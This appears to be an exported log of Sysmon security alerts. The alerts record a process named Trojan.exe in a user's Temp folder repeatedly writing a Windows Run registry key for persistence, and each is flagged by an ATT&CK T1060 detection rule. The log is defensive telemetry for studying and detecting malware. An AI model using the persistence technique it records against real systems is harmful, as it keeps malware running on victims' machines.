HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:13.659712000Z"",""eventRecordID"":""1467"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:13.643\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:13.643"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:25.759",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:12.627 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:12.632917700Z"",""eventRecordID"":""1466"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:12.627\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:12.627"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:24.755",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:11.611 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:11.614035500Z"",""eventRecordID"":""1465"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:11.611\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:11.611"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:23.757",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:10.596 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:10.602232800Z"",""eventRecordID"":""1463"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:10.596\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:10.596"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:22.834",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:09.580 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:09.584759100Z"",""eventRecordID"":""1462"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:09.580\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:09.580"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:21.756",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:08.564 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:08.566185900Z"",""eventRecordID"":""1459"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:08.564\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:08.564"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:20.756",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:07.549 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:07.552228100Z"",""eventRecordID"":""1457"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:07.549\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:07.549"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:19.646",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:06.517 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:06.526841900Z"",""eventRecordID"":""1456"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:06.517\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:06.517"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:18.662",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:05.502 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:05.504261000Z"",""eventRecordID"":""1454"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:05.502\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:05.502"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:17.598",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:04.486 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:04.498232500Z"",""eventRecordID"":""1450"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:04.486\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:04.486"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:15.614",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:03.471 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:03.473277800Z"",""eventRecordID"":""1449"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:03.471\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:03.471"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:15.598",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:02.455 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 